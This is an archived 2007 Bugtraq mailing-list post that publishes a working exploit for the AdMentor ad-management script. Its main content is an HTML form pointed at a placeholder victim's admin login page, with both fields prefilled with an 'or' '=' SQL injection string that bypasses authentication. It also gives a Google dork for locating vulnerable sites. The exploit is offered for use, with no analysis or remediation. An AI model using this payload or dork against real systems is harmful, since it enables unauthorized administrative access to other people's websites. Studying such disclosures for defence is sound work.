[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070220190229.18354.qmail@securityfocus.com>
Date: 20 Feb 2007 19:02:29 -0000
From: crazy_king@...7.org
To: bugtraq@...urityfocus.com
Subject: AdMentor Script Remote SQL injection Exploit
<html><title>AdMentor Script Remote SQL injection Exploit</title>
===============================================================================================
<p><b><font size="2">[Script Name: <font color="#0000FF">AdMentor admin SQL
injection
</font></font></b></p>
<p><b><font size="2">[Coded by : <font color="#FF0000">Cr@...King
</font></font></b></p>
<p><b><font size="2">[Author : <font color="#FF0000">Cr@...King
</font></font></b></p>
<p><b><font size="2">[Contact : <font color="#FF0000">Crazy_King@...7.org
</font></font></b></p>
<p><b><font size="2">[Dork : <font color="#0000FF">inurl:"admentor/admin"
</font></font></b></p>
<p><b><font size="2">[Dork Ex. : <font
color="#0000FF">http://www.google.com.tr/search?hl=tr&q=inurl%3A%22admentor%2Fadmin%22&btnG=Google%27da+Ara&meta=
</font></font></b></p>
<p><b><font size="2">[S.Page : <font
color="#0000FF">http://www.aspcode.net/products/admentor
</font></font></b></p>
<p><b><font size="2">[Thanks : <font color="#008000">Erne & ApAci & Eno7 &
Uyuss & Liz0zim & Thehacker
& Xoron & Ajann</font></font></b>
===============================================================================================
</p>
<FORM NAME=giris ACTION="http://victim.com/[path to script]/admin/login.asp"
METHOD=post>
<table align=center>
<td>Kullanici Adi:</td><td><INPUT NAME=kullanici class="input" value="'or' '='"
SIZE=15></td>
</tr><tr>
<td>Sifre:</td><td><INPUT NAME=parola TYPE=text class="input" value="'or' '='"
SIZE=15></td>
</tr><tr>
<td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td>
<b><font face="Verdana" size="2" color="#008000">Exploit Coded By
Cr@...King</font></b></p>
</tr></table></form></html>
Powered by blists - more mailing lists